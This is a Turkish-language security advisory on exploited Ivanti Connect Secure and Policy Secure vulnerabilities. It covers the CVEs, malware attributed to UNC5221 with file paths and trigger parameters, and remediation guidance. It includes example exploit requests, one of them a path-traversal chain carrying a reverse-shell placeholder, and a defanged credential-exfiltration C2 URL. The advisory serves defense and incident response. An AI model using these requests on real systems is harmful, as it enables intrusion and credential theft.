Ivanti Connect Secure Nedir? Ne için Kullanılır?
Ivanti Connect Secure, bir SSL VPN çözümüdür ve uzak veya mobil kullanıcıların herhangi bir web etkin cihazdan kurumsal kaynaklara güvenli ve maliyet etkin bir şekilde erişmelerini sağlar.
Ivanti Policy Secure Nedir? Ne için Kullanılır?
Ivanti Policy Secure (IPS) bir Ağ Erişim Kontrolü (NAC) çözümüdür. Bu çözüm, yalnızca yetkilendirilmiş ve güvenli kullanıcıların ve cihazların ağa erişmesine izin vererek ağı korur ve misyon kritik uygulamaları ve hassas verileri kapsamlı NAC yönetimi, görünürlük ve izleme yoluyla güvence altına alır.
Ivanti Neurons for ZTA Nedir? Ne için Kullanılır?
Ivanti Neurons for Zero Trust Access (nZTA) kurumsal seviye sıfır güvenliğe dayalı güvenli erişim yönetim platformudur. Bu hizmet, hibrit ve çoklu bulut ortamları için gerçek bir sıfır güvenliğe dayalı erişimi servis olarak sunar. Temel özellikleri arasında, herhangi bir erişim sağlanmadan önce kullanıcı kimlik doğrulaması ve yetkilendirmesi, kontrol ve veri düzlemlerinin ayrılması bulunur.
Güvenlik Açıkları Hakkında
31 Ocak itibariyle Ivanti, dört CVE’den üçünün sıfır gün olarak istismar edildiğinin gözlemlendiğini açıklamıştır:
CVE-2023-46805
CVE-2024-21887
CVE-2024-21893
Ivanti Connect Secure ve Policy Secure’un web bileşenini etkileyen ayrıcalık yükseltme güvenlik açığı olan CVE-2024-21888’e yönelik bilinen bir istismar gözlemlenmemiştir. Araştırmacılar güvenlik açıklarının Çin devlet destekli hacker grubu UNC5221 tarafından sömürüldüğünü ve kalıcı erişimi sürdürmek için webshell kullandıklarını açıklamıştır.
CVE NO: CVE-2024-21888
ÖNEM DERECESİ : 8.8(Yüksek)
ETKİLENEN ÜRÜN:
Ivanti Connect Secure
Ivanti Policy Secure
ETKİLENEN VERSİYON:
Ivanti Connect Secure (9.x, 22.x)
Ivanti Policy Secure (9.x, 22.x)
CVE-2024-21888, Ivanti Connect Secure ve Ivanti Policy Secure, sürüm 9.x ve 22.x’in web bileşeninde tanımlanan önemli bir güvenlik açığıdır. Bu güvenlik açığı ayrıcalık yükseltme sorunu olarak sınıflandırılır; bu, kullanıcının yöneticinin ayrıcalıklarına eşdeğer yükseltilmiş ayrıcalıklar elde etmesine olanak verebileceği anlamına gelir.
CVE-2024-21888’in kötüye kullanılması, bir saldırganın etkilenen sistemlere yetkisiz yönetim erişimi sağlama potansiyeline sahiptir. Bu düzeydeki erişim, sistem yapılandırmalarını değiştirme, hassas verilere erişme ve potansiyel olarak ağın genel güvenliğini tehlikeye atma yeteneği de dahil olmak üzere çok çeşitli kötü amaçlı etkinliklere yol açabilir.
CVE NO: CVE-2024-21893
ÖNEM DERECESİ : 8.2(Yüksek)
ETKİLENEN ÜRÜN:
Ivanti Connect Secure
Ivanti Policy Secure
Ivanti Neurons for ZTA
ETKİLENEN VERSİYON:
Ivanti Connect Secure (9.x, 22.x)
Ivanti Policy Secure (9.x, 22.x)
Ivanti Neurons for ZTA
CVE-2024-21893, Ivanti Connect Secure, Ivanti Policy Secure ve Ivanti Neurons for ZTA’nın SAML bileşeninde yer alan ciddi bir güvenlik açığıdır. Bu sunucu tarafı istek sahteciliği (SSRF) zafiyeti, yetkisiz kullanıcıların kimlik doğrulaması gerekmeden belirli kısıtlı kaynaklara erişim sağlamasına imkan tanır. Saldırganlar, SSRF zafiyetini kullanarak, normalde erişilemeyen iç ağ kaynaklarına veya dosyalara erişebilir ve bu da kurumsal güvenlik için ciddi bir risk oluşturur.
CVE NO: CVE-2023-46805
ÖNEM DERECESİ : 8.2(Yüksek)
ETKİLENEN ÜRÜN:
Ivanti Connect Secure
Ivanti Policy Secure
ETKİLENEN VERSİYON:
Ivanti Connect Secure (9.x, 22.x)
Ivanti Policy Secure (9.x, 22.x)
CVE-2023-46805, Ivanti Connect Secure ve Policy Secure ürünlerindeki web bileşeninde bulunan bir kimlik doğrulama atlama güvenlik açığıdır. Bu açık, “/api/v1/totp/user-backup-code” uç noktasında tespit edilen bir path-traversal zafiyetinden kaynaklanmaktadır. Özellikle, bu uç nokta herhangi bir kimlik doğrulama gerektirmez, bu da saldırganın kimliği doğrulanmış yolu bu kimliği doğrulanmamış yoldan çağırmasına olanak tanır, kimlik doğrulama eksikliği ve yol geçişi zafiyetini birleştirerek, uç noktadaki kaynaklara erişim sağlarlar. Bu zafiyet, yol karşılaştırmasının normalizasyon olmadan yapılmasından kaynaklanır ve sistemler için ciddi bir güvenlik riski oluşturur.
//Example GET Request to test for CVE-2023-46805
GET /api/v1/totp/user-backup-code/../../system/system-information
HTTP/1.1 Host: <IP_Vulnerable_Ivanti_Product>
Content-Length: 0
//Response from the vulnerable product
…
"system-information" : {
"Cluster-node" : {},
"Hardware-model" : "PSA-3000",
"host-name" : <redacted>
"machine-id" : <redacted>
"os-name" : "ive-sa",
"os-version" : "9.1R18.1",
"serial-number": <redacted>
}
…CVE NO: CVE-2024-21887
ÖNEM DERECESİ : 9.1(Kritik)
ETKİLENEN ÜRÜN:
Ivanti Connect Secure
Ivanti Policy Secure
ETKİLENEN VERSİYON:
Ivanti Connect Secure (9.x, 22.x)
Ivanti Policy Secure (9.x, 22.x)
CVE-2024-21887, Ivanti ürünlerinin “/api/v1/license/key-status/path:node_name” API uç noktasında bulunan bir komut enjeksiyonu zafiyetidir. Bu zafiyet, kullanıcı tarafından gönderilen verilerin Python’un “subprocess.Popen(shell=True)” fonksiyonunda herhangi bir temizleme işlemi yapılmadan doğrudan kullanılmasından kaynaklanır. Sonuç olarak, saldırganlar “;command;” enjekte edebilir ve Ivanti ürününde kabuk komutları çalıştırabilirler. Saldırganlar, bu zafiyeti ve CVE-2023-46805 zafiyetini bir arada kullanarak, Ivanti ürününde ters bağlantı oluşturabilirler. Bu durum, Ivanti sistemlerinin güvenliği için önemli bir risk oluşturur ve etkilenen sistemlerde derhal güvenlik önlemlerinin alınmasını gerektirir.
GET /api/v1/totp/user-backup-code/../../license/keys-status/<url_encoded_python_reverse_shell>
HTTP/1.1 Host: <IP_Vulnerable_Ivanti_Product>
Post Exploitation Aktiviteleri
THINSPOOL Dropper
THINSPOOL, LIGHTWIRE webshell’ini meşru bir CS dosyasına yazan bir shell script dropper’dır.
Güncellemeler sonrasında meşru dosyalara kötü amaçlı webshell kodunu tekrar ekleyerek UNC5221’in istismar edilen cihazlarda kalıcılığını sağlar.
Ivanti’nin Integrity Checker’ı atlatmaya çalışır, ancak bu girişimin başarısız olduğu gözlemlenmiştir.
LIGHTWIRE ve WIREFIRE Web Shell’leri
LIGHTWIRE, rastgele komut yürütme yeteneği sağlamak için meşru bir Secure Connect dosyasına gömülü Perl CGI tabanlı bir webshell’dir.
“comp=comp” ve “compid” parametrelerini içeren compcheckresult.cgi‘ye yönlendirilen istekleri yakalar.
WIREFIRE, Connect Secure cihazının bir bileşenine eklenmiş trojanize Python tabanlı bir webshell’dir.
Zararlı, belirli HTTP POST istekleriyle dosyaları indirme ve rastgele komutlar yürütme yeteneği sunar.
LIGHTWIRE varyant
LIGHTWIRE varyantı, VPN ağ geçidinin meşru bir bileşeni olan compcheckresult.cgi içine kendini yerleştiren ek bir webshell varyantıdır.
/dana-na/auth/url_default/compcheckresult.cgi?comp=comp&compid=<obfuscated command>LIGHTWIRE varyantı örnekte verilen GET parametrelerini kullanır.
LIGHTWIRE varyantı, LIGHTWIRE’den farklı bir gizleme rutini kullanır ve RC4 ile şifre çözme için kullanılan anahtarı Base64 kodunu çözerek gelen isteği şifresini çözer.
CHAINLINE ve FRAMESTING Web Shell’leri
CHAINLINE, Ivanti Connect Secure Python paketine yerleştirilmiş bir Python web shell arka kapısıdır.
CHAINLINE, Ivanti Connect Secure Python paketindeki /api/v1/cav/client/health REST endpoint’inde erişilebilir hale getirildi.
CHAINLINE ve FRAMESTING web shell’leri, Ivanti Connect Secure Python paketine gömülü Python web shell arka kapılarıdır ve keyfi komut çalıştırma yeteneği sağlar. CHAINLINE, /home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/resources/health.py yolunda, FRAMESTING ise /home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/resources/category.py yolunda tanımlanmıştır.
CHAINLINE, mevcut bir dosyayı değiştirmek yerine yeni bir health.py dosyası oluşturur.
FRAMESTING web shell, DSID adlı bir cookie veya POST verileri içinde zlib ile sıkıştırılmış veriler yoluyla komutları kabul eder.
ZIPLINE Passive Backdoor
ZIPLINE, libsecure.so dosyasından accept() fonksiyonunu ele geçiren pasif bir arka kapıdır.
Zararlı accept() fonksiyonu, ağ trafiğini yakalamak için öncelikle zararsız libc içinden accept() fonksiyonunu çözümler.
Gelen bir bağlantı öncelikle zararsız libc_accept tarafından işlenir ve ZIPLINE, süreç adının “web” olup olmadığını kontrol eder.
21 bayta kadar veri alır ve alınan buffer’ın “SSH-2.0-OpenSSH_0.3xx.” stringine karşılık gelip gelmediğini doğrular.
Eşleşme sağlandığında ZIPLINE’ın kötü amaçlı işlevselliği tetiklenir ve şifrelenmiş bir başlık alır ki bu, yürütülecek komutu belirtir.
WARPWIRE Credential Harvester
WARPWIRE, meşru bir Connect Secure dosyasına gömülü Javascript tabanlı bir kimlik bilgisi toplayıcıdır.
Düz metin şifreler ve kullanıcı adlarını hedef alır ve bunları bir komuta ve kontrol (C2) sunucusuna HTTP GET isteği ile gönderir.
Web giriş sırasında sunulan kimlik bilgilerini yakalar ve bunları bir C2’ye HTTP GET isteği ile göndermeden önce btoa() ile Base64 kodlar.
hxxps://symantke[.]com/?<username>&<password>BUSHWALK Webshell
BUSHWALK, Perl dilinde yazılmış ve meşru bir CS dosyası olan querymanifest.cgi içine gömülmüştür.
SafariiOS web istek platform parametresi olduğunda, BUSHWALK zararlı Perl fonksiyonu validateVersion’ı çalıştırır.
Web isteğinin komut parametresindeki tehdit aktörünün yükünü Base64 ve RC4 kullanarak kod çözer ve şifresini çözer.
Şifresi çözülmüş yük, webshell’in sunucudan bir dosya okumasını veya sunucuya bir dosya yazmasını belirler.
Okuma işlemi için, BUSHWALK changeData fonksiyonunu çağırır; yazma işlemi için updateVersion fonksiyonunu çağırır.
| Code Family | Filename |
| CHAINLINE | /home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/resources/health.py |
| FRAMESTING | /home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/resources/category.py. |
| LIGHTWIRE / LIGHTWIRE Variant | /home/webserver/htdocs/dana-na/auth/compcheckresult.cgi |
| BUSHWALK | querymanifest.cgi |
| ZIPLINE | /tmp/data/root/home/lib |
| THINSPOOL Dropper | /home/etc/sql/dsserver/sessionserver.pl |
| WIREFIRE | /api/v1/cav/client/visits |
| WARPWIRE Credential Harvester | /home/webserver/htdocs/dana-na/auth/lastauthserverused.js |
DÜZELTME SÜRECİ VE ÖNERİLEN İYİLEŞTİRMELER
Etkilenen cihaz(lar)dan adli analiz ve soruşturma amaçları doğrultusunda bir adli görüntü alınması gerekmektedir. Bu işlem, ilerideki analizlerde kullanılmak üzere kritik verilerin korunmasını sağlayacaktır.
Cihazın mevcut yapılandırmasının bir yedeğinin alınması önerilir. Bu, cihaz sıfırlama veya yükseltme işlemleri sonrasında orijinal yapılandırmaların kolaylıkla geri yüklenmesine olanak tanır.
Güvenlik açıklarından etkilenen cihazın iki kez fabrika ayarlarına sıfırlanması veya yükseltilmesi tavsiye edilir:
Bu işlem, cihazda sömürülmüş veya sonradan eklenmiş olabilecek dosyaların yükseltme işleminden sonra korunamayacağını garanti altına alır.
İki kez yapılan yükseltme, cihazın yalnızca bir önceki sürüme geri dönebilmesini sağlayarak, kompromit edilmiş sürüme dönülmesini engeller ve güvenlik risklerini minimize eder.
CVE-2023-46805, CVE-2024-21887, CVE-2024-21888 ve CVE-2024-21893 numaralı güvenlik açıklarını gideren resmi yamanın indirilip uygulanması gerekmektedir:
Eğer yama uygulanmadan önce geçici bir önlem olarak bir XML dosyası uygulandıysa, yama uygulandıktan sonra bu XML dosyasının kaldırılması mümkündür. Bu işlem için gerekli adımlar, indirme portalında yer almaktadır.
Eğer etkilenen bir cihaz için henüz resmi bir yama mevcut değilse, yükseltme işlemi tamamlandıktan sonra mitigation.release.20240126.5.xml dosyası aracılığıyla bir mitigasyon yamasının uygulanması önerilir:
Bu işlem, cihazın işlevselliği ve özellikleri üzerinde etkilere yol açabilir, örneğin SAML kimlik doğrulaması gibi.
XML dosyası yerindeyken, Ivanti tarafından resmi yamalar yayınlanıncaya kadar cihazlara yapılandırma işleminin durdurulması ve XML dosyası kaldırılıncaya kadar işleminin yeniden başlatılmaması tavsiye edilir.
Cihaz yapılandırmasının geri yüklenmesi, cihaz özelinde saklanan gizliliklerin iptali veya döndürülmesi, saklanan sertifikaların yeniden düzenlenmesi, admin etkinleştirme şifresinin, API anahtarlarının ve yerel kullanıcı şifrelerinin sıfırlanması gerekmektedir.
Eğer cihazda herhangi bir kimlik bilgisi çalan yazılım tespit edilirse, bu dönemde cihaza kimlik doğrulaması yapmış kullanıcıların şifrelerinin sıfırlanması önerilir. Bu önlem, güvenlik ihlallerinin daha da yayılmasını önlemeye yardımcı olacaktır.
REFERANSLAR
https://www.picussecurity.com/resource/blog/ivanti-cve-2023-46805-and-cve-2024-21887-zero-day-vulnerabilities
https://www.cisa.gov/news-events/alerts/2024/01/30/updated-new-software-updates-and-mitigations-defend-against-exploitation-ivanti-connect-secure-and
https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US
https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?
https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation
https://www.ivanti.com/blog/security-update-for-ivanti-connect-secure-and-ivanti-policy-secure-gateways
https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day
